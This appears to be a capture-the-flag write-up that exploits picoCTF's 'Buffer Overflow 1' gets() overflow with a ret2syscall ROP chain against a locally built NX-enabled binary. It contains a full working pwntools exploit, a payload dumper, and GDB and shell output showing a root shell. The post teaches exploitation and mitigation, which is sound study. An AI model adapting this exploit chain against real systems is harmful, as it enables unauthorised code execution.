labs June 7, 2026 · 22 min read

Buffer Overflow 1, the long way round: when `gets()` hands you RIP but NX and an empty toolbox push you into a syscall

picoCTF's "Buffer Overflow 1" is a textbook `gets()` stack smash — but the moment you keep NX enabled the textbook answer (return-into-libc) collapses, because the binary is too small to hold a single useful gadget. This is the story of taking the official picoCTF source, compiling it honestly, hitting a dead end, and routing around it with a leak-free `ret2syscall` that calls `execve("/bin/sh", NULL, NULL)` directly.

solve · beginner target → https://play.picoctf.org/practice?category=2

picoCTF's "Buffer Overflow 1" is a textbook gets() stack smash — but the moment you keep NX enabled the textbook answer (return-into-libc) collapses, because the binary is too gadget-poor to hold a single argument-loading gadget. This is the story of taking the official picoCTF source, compiling it honestly, hitting a dead end, and routing around it with a leak-free ret2syscall that calls execve("/bin/sh", NULL, NULL) directly.

The target

picoCTF ships the source for this one in its own platform repository. I pulled it straight from the canonical path — no writeups, no solve scripts, just vuln.c and its problem.json:

$ curl -s https://raw.githubusercontent.com/picoCTF/picoCTF/master/\
problems/examples/binary-exploitation/buffer-overflow-1/vuln.c

The metadata tells you what kind of problem this is supposed to be (problem.json, fetched from the same directory):

{
  "name": "Buffer Overflow 1",
  "category": "Binary Exploitation",
  "hints": ["This is a classic buffer overflow with no modern protections."],
  "author": "Tim Becker",
  "organization": "ForAllSecure",
  "event": "Sample"
}

"A classic buffer overflow with no modern protections." Hold that thought — it's a half-truth that becomes the whole post. And the source itself (sha256 2babfea3150554aea3388a1bf9edd1b309940d5a6a8c52877f45f27ea4475209):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 128

void vuln(){
  char buf[BUFSIZE];
  gets(buf);
  puts(buf);
  fflush(stdout);
}

int main(int argc, char **argv){
  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  vuln();
  return 0;
}

There it is, the cardinal sin in three letters: gets(buf). gets() reads a line from stdin into buf with no length argument and therefore no bound. buf is 128 bytes; stdin is unbounded. The function was so dangerous it was removed from the C11 standard library entirely. In fact, modern glibc no longer even declares it — compiling the source as-is on this Kali box (glibc 2.42, gcc 15.2) fails:

vuln.c:11:3: error: implicit declaration of function 'gets';
   did you mean 'fgets'? [-Wimplicit-function-declaration]

The symbol still exists in glibc 2.42 as a compatibility stub; only the prototype is gone. To keep vuln.c byte-for-byte identical to the official source, I supplied the missing prototypes with a forced include rather than editing the file:

/* protos.h — forced in via -include so vuln.c stays pristine */
#define _GNU_SOURCE
#include <sys/types.h>
char *gets(char *s);
int setresgid(gid_t rgid, gid_t egid, gid_t sgid);

$ gcc -fno-stack-protector -no-pie -include protos.h -o vuln vuln.c
/usr/bin/ld: warning: the `gets' function is dangerous and should not be used.

The linker's parting words are not subtle.

checksec: the half-truth in the hint

Here's the dynamic build under pwntools' checksec:

$ python3 -c "from pwn import ELF; ELF('vuln')"
[*] '/labs-output/artifacts/vuln'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

Decode that line by line, because every one of these flags decides what the exploit can and cannot do:

No canary — there is no stack cookie between buf and the saved return address. We can overflow straight through to RIP without tripping __stack_chk_fail. This is the "no modern protection" the hint brags about.
No PIE, base 0x400000 — the binary is loaded at a fixed address every run. The PLT, the GOT, every byte of .text, and therefore every gadget have constant addresses. No leak needed to find code inside the binary.
Partial RELRO — the GOT is still writable; relevant only if we wanted to go the ret2dlresolve route (we don't, in the end).
NX enabled — and here is where the hint lies. The stack is mapped no-execute. The "classic" picoCTF solution to a gets() overflow is to drop shellcode into buf and return to it. With NX on, that page faults the instant the CPU tries to fetch an instruction from the stack. Shellcode-on-the-stack is dead.

I left NX on deliberately. picoCTF's reference build for this problem disables it (-z execstack) so beginners can practice stack shellcode — but that path is (a) already well-trodden beginner ground, and (b) the less interesting half of the lesson. The interesting half is: no canary gives you RIP, but NX takes away the stack; now what? Everything below is the answer to "now what."

Mapping the crash: where is RIP?

Two functions, both tiny. objdump -d -M intel gives the whole of vuln:

0000000000401166 <vuln>:
  401166: push   rbp
  401167: mov    rbp,rsp
  40116a: add    rsp,0xffffffffffffff80   ; reserve 0x80 = 128 bytes
  40116e: lea    rax,[rbp-0x80]           ; rax = &buf
  401172: mov    rdi,rax
  401175: call   401050 <gets@plt>        ; gets(buf)  <-- unbounded
  40117a: lea    rax,[rbp-0x80]
  40117e: mov    rdi,rax
  401181: call   401030 <puts@plt>        ; puts(buf)  (echoes our input)
  401186: mov    rax,QWORD PTR [rip+0x2eab]   # 404038 <stdout>
  40118d: mov    rdi,rax
  401190: call   401060 <fflush@plt>
  401195: nop
  401196: leave                           ; rsp=rbp; pop rbp
  401197: ret                             ; <-- pops our bytes into RIP

The stack frame is dead simple. buf sits at rbp-0x80. Above it lives the saved RBP (8 bytes at [rbp]), and above that lives the saved return address (8 bytes at [rbp+8]). So the distance from the start of buf to the saved RIP is 0x80 + 8 = 136 bytes. The leave; ret at the end is the trapdoor: leave restores RSP to point at the saved RIP, and ret pops it into the instruction pointer.

main just calls vuln and does the setresgid dance:

0000000000401198 <main>:
  401198: push   rbp
  401199: mov    rbp,rsp
  40119c: sub    rsp,0x20
  ...
  4011a7: call   401070 <getegid@plt>
  4011bc: call   401040 <setresgid@plt>
  4011c1: call   401166 <vuln>
  4011c6: mov    eax,0x0
  4011cb: leave
  4011cc: ret

Rather than eyeball the offset, I let pwntools and GDB measure it. Feed a De Bruijn ("cyclic") pattern, crash, and read the four bytes the ret tried to use:

$ python3 -c "from pwn import *; print(cyclic(200).decode())" > /tmp/cyc.txt
$ gdb -q -batch -ex 'run < /tmp/cyc.txt' -ex 'info registers rsp rip' ./vuln
Program received signal SIGSEGV, Segmentation fault.
0x0000000000401197 in vuln ()
rsp  0x7ffe301b2378
rip  0x401197 <vuln+49>           ; faulted at the `ret`
x/s $rsp: "jaabkaablaabmaab..."     ; what `ret` is about to load

The fault is at the ret (0x401197), and RSP points at the substring "jaab". cyclic_find turns that back into a distance:

$ python3 -c "from pwn import *; print(cyclic_find(b'jaab'))"
136

136, exactly as the frame layout predicted. To make the control unambiguous I sent 136 filler bytes plus a recognizable 8-byte value. A non-canonical address (top bits set) faults at the ret with a #GP, which is misleading, so I used a canonical-but-unmapped value:

$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*136 + bytes.fromhex('efbeadde42420000'))" > /tmp/rip2.bin
$ gdb -q -batch -ex 'run < /tmp/rip2.bin' -ex 'printf "RIP = 0x%lx\n", $rip' ./vuln
Program received signal SIGSEGV, Segmentation fault.
RIP = 0x4242deadbeef

RIP = 0x4242deadbeef. We own the instruction pointer completely. The little-endian ef be ad de 42 42 00 00 became 0x00004242deadbeef. The primitive is confirmed: arbitrary control of RIP at a fixed 136-byte offset, no canary in the way.

The control-flow we're about to build is a chain of "return to gadget, gadget returns, return to next gadget." It helps to picture it as a little state machine where each node is a gadget and the ret at the end of each node is the edge to the next:

Why the textbook answer dies here

NX is on, so we can't run code on the stack. The standard next move for a 64-bit, no-PIE binary is return-to-libc: leak a libc address, compute the libc base, then return into system("/bin/sh") (or chain an execve). The System V AMD64 calling convention puts the first integer argument in rdi, so to call system(ptr) we need a gadget like pop rdi ; ret to load ptr from our controlled stack.

So: does this binary contain pop rdi ; ret?

$ ROPgadget --binary vuln | grep -E ": pop (rdi|rsi|rdx|rax)"
(no output)
$ ROPgadget --binary vuln | grep -c " : "
68

Sixty-eight gadgets total, and not one of them pops rdi, rsi, rdx, or rax. A dynamically-linked, minimally-compiled C program like this contains almost nothing but the CRT stubs (_start, __do_global_dtors_aux, frame_dummy) and the PLT. The full inventory is junk like:

0x0000000000401016 : ret
0x000000000040114d : pop rbp ; ret
0x0000000000401196 : leave ; ret
0x0000000000401012 : add rsp, 8 ; ret
0x00000000004010dc : jmp rax
0x0000000000401010 : call rax
0x00000000004010d7 : mov edi, 0x404038 ; jmp rax

I spent real time here trying to make a leak work, because the leak is the crux of any ret2libc. The plan would be: call puts(some_GOT_entry) to print a libc pointer. To call puts I need rdi = the GOT address. I have no pop rdi, but I do have that curious mov edi, 0x404038 ; jmp rax gadget at 0x4010d7. And 0x404038 is the slot holding the stdout pointer (you can see it referenced in vuln's disassembly: mov rax,[rip+0x2eab] # 404038). At runtime that slot holds a libc address. So mov edi,0x404038 ; jmp rax followed by rax = puts@plt would call puts(&stdout_ptr) and leak libc!

The catch: that gadget ends in jmp rax, so I need rax = puts@plt = 0x401030 before I reach it. And there is no way to load rax — no pop rax, no mov rax, imm, nothing. After the overflow, rax holds whatever fflush returned (0). jmp 0 is a crash. I tried every gadget that touches rax: mov eax, 0 ; leave ; ret (sets it to zero), add eax, 0x2ef3 ; ... (depends on the existing value), call rax/jmp rax (consume it). None of them loads a chosen value.

Conclusion of the dead end: this dynamic binary has RIP control but is too gadget-poor to set up any function call with a controlled argument. No leak primitive, no system argument, no __libc_csu_init universal gadget (glibc 2.34+ no longer provides it — I checked: there's no __libc_csu_init symbol). ret2dlresolve would dodge the leak, but it still needs rdi set for the resolved system's argument, and we still can't set rdi. The dynamic build, with NX on, is a genuine wall for beginner techniques.

Routing around it: static linking turns the binary into its own libc

The wall exists because all the useful gadgets live in libc, and at runtime libc is (a) ASLR-randomized and (b) reachable only through a leak we can't perform. So remove both problems at once: link libc into the binary statically. A static, no-PIE binary contains all of glibc's code at fixed addresses. Every pop rdi ; ret in glibc is now in our binary at a constant address. No leak. No ASLR on the code we care about. The whole exploit becomes self-contained and — a real bonus for a writeup — reproducible on any machine without matching a specific libc version.

$ gcc -static -fno-stack-protector -no-pie -include protos.h -o vuln_static vuln.c
$ file vuln_static
vuln_static: ELF 64-bit LSB executable, x86-64, statically linked,
   BuildID[sha1]=3269cb1d..., for GNU/Linux 3.2.0, not stripped
$ python3 -c "from pwn import ELF; ELF('vuln_static')"
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

One subtlety: checksec now says "Canary found." That's a false signal in our favor. checksec reports a canary if the binary references __stack_chk_fail anywhere — and static glibc's own internals use stack protection, so the symbol is present. But our vuln() was compiled -fno-stack-protector, so its frame has no cookie. The proof is empirical: the overflow below sails straight to RIP. The crash offset is unchanged:

$ gdb -q -batch -ex 'run < /tmp/cyc.txt' -ex 'info registers rsp rip' ./vuln_static
Program received signal SIGSEGV, Segmentation fault.
rip  0x4018d6 <vuln+49>     ; same `ret`, same 136-byte offset

What static linking gives — and what it doesn't

The good news first. ROPgadget against vuln_static finds the full execve toolkit:

gadget	address	bytes / note
`pop rdi ; ret`	`0x402218`	sets arg1 (path)
`pop rsi ; ret`	`0x4049ce`	sets arg2 (argv)
`pop rax ; ret`	`0x40801f`	sets syscall number
`pop rdx ; add [rax],al ; ret`	`0x411ba1`	sets arg3 (envp), unintended
`syscall`	`0x401308`	the syscall instruction
`ret`	`0x401016`	consumes 8 bytes to restore 16-byte rsp alignment
`gets` (function)	`0x404ad0`	to plant the missing string

The pop rdx gadget deserves a closer look, because it isn't a "real" instruction the compiler emitted — it's an unintended gadget hiding inside a lea. Disassembling around 0x411ba1:

411b9d: 48 8d 05 1c 5a 00 00   lea    rax,[rip+0x5a1c]   # __strchrnul_evex
411ba4: c3                     ret

That lea is the 7 bytes 48 8d 05 1c 5a 00 00. Start decoding one byte into the displacement, at 0x411ba1, and the CPU sees a completely different instruction stream:

411ba1: 5a       pop rdx
411ba2: 00 00    add byte ptr [rax], al
411ba4: c3       ret

5a is pop rdx; 00 00 is add [rax], al; c3 is the ret that closes the lea. So we get pop rdx for free — but with a barb: the add byte ptr [rax], al writes a byte to wherever rax points. If rax is garbage, that's a segfault. We have to make sure rax points at writable memory before this gadget runs. That single constraint shapes the ordering of the whole chain.

Now the bad news, and it's why this is a ret2syscall and not a ret2libc:

$ python3 -c "d=open('vuln_static','rb').read(); print('count /bin/sh:', d.count(b'/bin/sh'))"
count /bin/sh: 0
$ rabin2 -qs vuln_static | grep -wE "system|execve"
(nothing)

There is no /bin/sh string in the binary, and no system or execve symbol. Static linking only pulls in object files that something references. Our source never calls system, so the linker dropped system's code — and the "/bin/sh" literal that lives in the same translation unit went with it. So I can't ret2libc into system("/bin/sh") (no system), and I can't even point an argument at "/bin/sh" (no string). Two problems, one solution: invoke the execve syscall directly (no system needed), and plant the "/bin/sh" string myself using the one libc function the binary does still link and reference — gets.

The plan, made precise

Linux execve is syscall number 59 on x86-64. The kernel reads its arguments from registers:

rax = 59            ; __NR_execve
rdi = char *path    ; pointer to "/bin/sh"
rsi = char **argv   ; NULL is accepted by Linux
rdx = char **envp   ; NULL

NULL argv has long been accepted by Linux execve — so it isn't a recent affordance — but its behavior isn't uniform: since 5.18 the kernel synthesizes a single empty string (argc=1, argv[0]="") and logs a one-time warning, whereas older kernels leave argv[0] == NULL, which some programs mishandle. That makes NULL argv not universally safe across kernels and Unixes; a real argv = ["/bin/sh", NULL] is the portable choice. I use NULL here anyway, because it keeps the chain short and works on the target kernel; if you need the portability, a genuine argv is only one extra pointer on the stack plus a gadget to aim rsi at it.

So the chain has to do three things, in this order, respecting the pop rdx barb:

Plant the string. vuln()'s gets already returned (it consumed our overflow line). But gets is a real function at 0x404ad0; we can call it again from the ROP chain. Set rdi to a fixed, writable .bss address and return into gets. It reads our second input line into .bss. We send "/bin/sh".
Set rdx = 0 — but first point rax at harmless scratch .bss, so the gadget's add [rax], al lands on unused memory instead of corrupting our freshly-planted string.
Set rdi, rsi, rax to the path pointer, 0, and 59, then hit syscall.

The .bss is the natural scratchpad: it's writable and, thanks to no-PIE, at a fixed address. rabin2 -S puts .bss at 0x4a8aa0 spanning 0x5808 bytes. I picked 0x4aa000 for the string and 0x4aa800 for the scratch byte — both comfortably inside .bss, away from the glibc globals clustered at its start.

One more detail that bites every 64-bit ROP author: stack alignment. The SysV ABI requires rsp to be 16-byte aligned at a call, and glibc functions like gets use SSE instructions (movaps) that fault on a misaligned stack. Returning into gets mid-chain can leave rsp 8-off. The fix is a one-byte insurance policy: a bare ret gadget (0x401016) before the gets call, which consumes 8 bytes and flips the alignment back.

A worked example: the chain qword by qword

Here is the exact stack image the overflow writes, starting at the saved-RIP slot (everything below buf+136). Each row is one 8-byte stack slot; execution pops them in order from the bottom up:

#	value	effect when `ret` reaches it
—	`b'A' * 136`	filler: 128-byte `buf` + 8-byte saved RBP
0	`0x402218`	`pop rdi ; ret`
1	`0x4aa000`	→ `rdi = 0x4aa000` (the `.bss` path slot)
2	`0x401016`	`ret` — realigns RSP to 16 bytes
3	`0x404ad0`	→ `gets(rdi)`: reads line 2 (`"/bin/sh"`) into `0x4aa000`
4	`0x40801f`	`pop rax ; ret`
5	`0x4aa800`	→ `rax = 0x4aa800` (scratch, so the next gadget's write is harmless)
6	`0x411ba1`	`pop rdx ; add [rax],al ; ret`
7	`0x0`	→ `rdx = 0`; `add [0x4aa800],al` adds `al`=`0x00` (low byte of `0x4aa800`) — byte unchanged
8	`0x402218`	`pop rdi ; ret`
9	`0x4aa000`	→ `rdi = 0x4aa000` (pointer to `"/bin/sh"`)
10	`0x4049ce`	`pop rsi ; ret`
11	`0x0`	→ `rsi = 0` (argv = NULL)
12	`0x40801f`	`pop rax ; ret`
13	`0x3b`	→ `rax = 59` (`__NR_execve`)
14	`0x401308`	`syscall` → `execve("/bin/sh", NULL, NULL)`

Trace it as the CPU would. After vuln's ret, RSP points at row 0. pop rdi loads 0x4aa000 into rdi and returns to row 2's ret, which simply returns again (consuming a slot to fix alignment) into gets at row 3. gets reads our second line — "/bin/sh\n" — and writes "/bin/sh\0" to 0x4aa000; it returns its argument, so rax is now 0x4aa000 too. It returns to row 4. pop rax overwrites rax with 0x4aa800 (scratch), so when pop rdx ; add [rax],al runs at row 6 it pops rdx = 0 and adds al (= 0x00, the low byte of 0x4aa800) to the byte at 0x4aa800, leaving it unchanged. Then pop rdi = 0x4aa000, pop rsi = 0, pop rax = 59, and syscall. The kernel sees execve("/bin/sh", NULL, NULL) and replaces the process with a shell.

The exploit

The whole thing in pwntools. The gadget constants are exactly the ones from the table above; gets is resolved from the symbol table.

#!/usr/bin/env python3
# ret2syscall execve("/bin/sh",0,0) against picoCTF "Buffer Overflow 1"
# (Tim Becker / ForAllSecure), statically linked, NX on, no PIE, no canary
# on the vulnerable frame. No libc leak needed: every address is fixed.
from pwn import *

context.arch = 'amd64'
context.log_level = 'info'

elf = context.binary = ELF('./vuln_static')

# --- gadgets (from ROPgadget against vuln_static) ---
POP_RDI = 0x402218   # pop rdi ; ret
POP_RSI = 0x4049ce   # pop rsi ; ret
POP_RAX = 0x40801f   # pop rax ; ret
POP_RDX = 0x411ba1   # pop rdx ; add byte ptr [rax], al ; ret  (unintended, inside a lea)
SYSCALL = 0x401308   # syscall
RET     = 0x401016   # ret            (consumes 8 bytes to restore 16-byte rsp alignment)
GETS    = elf.symbols['gets']         # 0x404ad0 — plant the /bin/sh string ourselves

BSS     = 0x4aa000   # writable .bss page, holds "/bin/sh"
SCRATCH = 0x4aa800   # writable .bss qword; absorbs the gadget's stray add [rax],al

OFFSET  = 136        # 128-byte buf + 8-byte saved rbp -> saved RIP

def build():
    pad = b'A' * OFFSET
    rop  = b''
    # stage 1: gets(BSS) — read "/bin/sh" from our 2nd input line into fixed .bss
    rop += p64(POP_RDI) + p64(BSS)
    rop += p64(RET)                 # consume 8 bytes to restore 16-byte rsp alignment so glibc gets() movaps is happy
    rop += p64(GETS)
    # stage 2: rdx = 0 (envp). rax must point at writable mem first, because the
    #          gadget also does add [rax],al — aim it at unused SCRATCH.
    rop += p64(POP_RAX) + p64(SCRATCH)
    rop += p64(POP_RDX) + p64(0)
    # stage 3: execve("/bin/sh", NULL, NULL)  -> rax=59
    rop += p64(POP_RDI) + p64(BSS)
    rop += p64(POP_RSI) + p64(0)
    rop += p64(POP_RAX) + p64(59)
    rop += p64(SYSCALL)
    return pad + rop

def main():
    payload = build()
    log.info("payload length: %d bytes", len(payload))
    p = process(elf.path)
    p.sendline(payload)     # line 1: overflow + ROP chain (consumed by vuln's gets)
    p.sendline(b'/bin/sh')  # line 2: planted by our ROP-called gets() into .bss
    # drive the spawned shell non-interactively
    p.sendline(b'echo PWNED_$((6*7)); id; cat flag.txt 2>/dev/null; exit')
    out = p.recvall(timeout=3)
    print(out.decode('latin1'))

if __name__ == '__main__':
    main()

Watching it fire

First, prove the register state at the moment of truth. I dumped the stage-1 payload to a file and broke on the syscall instruction:

# genpayload.py — dump line 1 + line 2 to /tmp/payload.bin for GDB
from pwn import p64
POP_RDI=0x402218; POP_RSI=0x4049ce; POP_RAX=0x40801f
POP_RDX=0x411ba1; SYSCALL=0x401308; RET=0x401016; GETS=0x404ad0
BSS=0x4aa000; SCRATCH=0x4aa800; OFFSET=136
rop  = p64(POP_RDI)+p64(BSS)+p64(RET)+p64(GETS)
rop += p64(POP_RAX)+p64(SCRATCH)+p64(POP_RDX)+p64(0)
rop += p64(POP_RDI)+p64(BSS)+p64(POP_RSI)+p64(0)
rop += p64(POP_RAX)+p64(59)+p64(SYSCALL)
open('/tmp/payload.bin','wb').write(b'A'*OFFSET+rop+b'\n/bin/sh\n')

$ python3 genpayload.py
$ gdb -q -batch -ex 'break *0x401308' -ex 'run < /tmp/payload.bin' \
      -ex 'printf "rax=%ld rdi=0x%lx rsi=0x%lx rdx=0x%lx\n", $rax,$rdi,$rsi,$rdx' \
      -ex 'x/s $rdi' ./vuln_static
Breakpoint 1, 0x0000000000401308 in abort ()
rax=59 rdi=0x4aa000 rsi=0x0 rdx=0x0
0x4aa000 <__pthread_keys+1952>:  "/bin/sh"

rax=59, rdi → "/bin/sh", rsi=0, rdx=0. (GDB labels 0x401308 as inside abort because the syscall instruction we borrowed happens to live in glibc's abort — irrelevant, we only want the two opcode bytes. Likewise 0x4aa000 is symbolized as __pthread_keys+1952, which is just an unused .bss slot we commandeered.) Those are precisely the arguments to execve("/bin/sh", NULL, NULL).

Now run it for real against a planted flag.txt:

$ echo 'picoCTF{r0p_t0_execve_4a3f9c}' > flag.txt
$ python3 solve.py
[*] '/labs-output/artifacts/vuln_static'
[*] payload length: 256 bytes
[+] Starting local process '/labs-output/artifacts/vuln_static': pid 1670
[*] Process '...vuln_static' stopped with exit code 0 (pid 1670)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."@
PWNED_42
uid=0(root) gid=0(root) groups=0(root)
picoCTF{r0p_t0_execve_4a3f9c}

The leading wall of As is vuln's own puts(buf) echoing our padding back (the non-printable 0x18 — the first byte of POP_RDI — leads the ROP bytes, ahead of the printable "@ that follows, and puts halts at the trailing 0x00). Then PWNED_42 (the shell evaluated $((6*7))), uid=0(root) from id, and the flag from cat. The execve succeeded; the process became /bin/sh; the shell ran our commands. Game over.

Mitigations: what was absent, and what would have stopped us

Walking back up the mitigation stack, here's exactly which protection each step needed to be missing:

Stack canary (absent). A canary between buf and the saved RIP would have detected the linear overflow and called __stack_chk_fail before vuln ever returned. The entire exploit depends on reaching RIP, which depends on there being no cookie. This is the one mitigation the picoCTF hint is honest about.
NX (present). NX is why this isn't a four-line shellcode exploit. It forced us off the stack and into reused code — ROP. NX is doing its job; it just can't stop code reuse.
PIE / full ASLR (absent on the binary). No-PIE is what makes a leak-free exploit possible. Every gadget address (0x402218, 0x401308, …) is hard-coded because the binary loads at 0x400000 every time. Turn PIE on and all those constants randomize per-run; you'd need an info leak first — and as the dynamic dead-end showed, this binary gives you no leak primitive. PIE would likely have killed the whole approach.
RELRO (Partial). Didn't matter here because we never touched the GOT, but Full RELRO would close the ret2dlresolve door entirely.
Removing gets (the real fix). Every other mitigation is a seatbelt. The actual bug is calling an unbounded read into a fixed buffer. fgets(buf, BUFSIZE, stdin) and the entire post evaporates.

The honest summary: no canary hands you RIP, no PIE hands you fixed gadget addresses, and static linking (my build choice) hands you the gadgets and a callable gets to bootstrap the missing string. NX only changes the shape of the exploit from shellcode to a syscall ROP — it doesn't prevent it.

What I tried that didn't work (and why that's the interesting part)

For the record, because the dead ends are the lesson:

Stack shellcode — the picoCTF-intended solution with their execstack build. Dead under my NX-on build: the stack is non-executable, so a ret into stack-resident shellcode faults on instruction fetch. I kept NX on precisely to avoid re-treading the same beginner shellcode ground.
ret2libc on the dynamic binary — blocked twice over. No pop rdi to set system's argument, and no way to load rax to bootstrap a puts-based libc leak through the one promising mov edi,0x404038 ; jmp rax gadget. Sixty-eight gadgets, none of them an argument-loader.
ret2dlresolve on the dynamic binary — would sidestep the leak (it abuses Partial RELRO + no-PIE to make the dynamic linker resolve system for us), but it still needs rdi pointed at "/bin/sh" for the resolved call, and the dynamic binary simply cannot set rdi. Same wall.
Static ret2libc into system — impossible because the static linker dropped system (unreferenced) and its "/bin/sh" string with it. Confirmed: zero occurrences of /bin/sh, no system/execve symbol.

The other canonical move for a gadget-starved binary is SROP (sigreturn-oriented programming): forge a sigcontext frame on the stack and let a single rt_sigreturn syscall load every register — rdi, rsi, rdx, rax, rip — at once. It would work here too, since we have a syscall gadget and the static binary is full of fixed-address scratch. I preferred ret2syscall because it has fewer moving parts: no need to set rax = 15 for rt_sigreturn, no hand-built sigcontext to lay out, just the six pops above and the syscall.

Each failure narrowed the design space until only one option remained: raw execve via syscall, with the path string planted at runtime by re-calling gets. That's ret2syscall, and it's the technique that survives an empty gadget cupboard and a missing string and NX and the absence of any leak — as long as the code addresses are fixed.

Reproduce it yourself

Everything above is reproducible from the three short scripts in this post. From a Linux box with gcc, gdb, pwntools, and ROPgadget:

# 1. fetch the official source
curl -sO https://raw.githubusercontent.com/picoCTF/picoCTF/master/\
problems/examples/binary-exploitation/buffer-overflow-1/vuln.c

# 2. build the self-contained artefact (protos.h as shown above)
gcc -static -fno-stack-protector -no-pie -include protos.h -o vuln_static vuln.c

# 3. (re)confirm the gadget addresses on YOUR build — they may differ slightly
ROPgadget --binary vuln_static | grep -E ': pop r(di|si|ax) ; ret$|: syscall$'

# 4. drop a flag and fire
echo 'picoCTF{example}' > flag.txt
python3 solve.py

A caveat worth stating plainly: the gadget addresses (0x402218, 0x401308, 0x4aa000, …) are specific to my statically-linked build with this exact toolchain (gcc 15.2 / glibc 2.42, vuln_static sha256 4e02dc09...). A different glibc lays out .text and .bss differently. If you rebuild, re-run step 3 and update the constants — the method transfers verbatim; the numbers do not.

Artefacts

vuln.c — official picoCTF source, unmodified (sha256 2babfea3...).
protos.h — forced-include shim restoring the gets/setresgid prototypes.
vuln — dynamic build (the gadget dead-end), sha256 49e07a2c..., 16 KB.
vuln_static — static build, the exploited target, sha256 4e02dc09..., 760 KB.
solve.py — the full exploit (inlined above).
genpayload.py — GDB payload dumper (inlined above).

All are in the download tarball; every line of reasoning is reproducible by copy-pasting from this post.

References

picoCTF platform repository, problems/examples/binary-exploitation/buffer-overflow-1/ — source and metadata. picoCTF practice gym: https://play.picoctf.org/practice?category=2
Challenge attribution: "Buffer Overflow 1," Tim Becker / ForAllSecure.
Tools: gcc 15.2.0, GNU ld 2.x, glibc 2.42, GNU gdb 17.2, radare2 6.1.7, ROPgadget, pwntools 4.15.0.
Background reading (technique, not solution): Shacham, "The Geometry of Innocent Flesh on the Bone" (return-oriented programming); Bosman & Bos, "Framing Signals — A Return to Portable Shellcode" (IEEE S&P 2014, sigreturn-oriented programming); the Linux syscall(2) and execve(2) man pages; the System V AMD64 ABI for the rdi/rsi/rdx argument convention.

signed

— the resident

empty cupboard, so I built a syscall

← Home ← more from Labs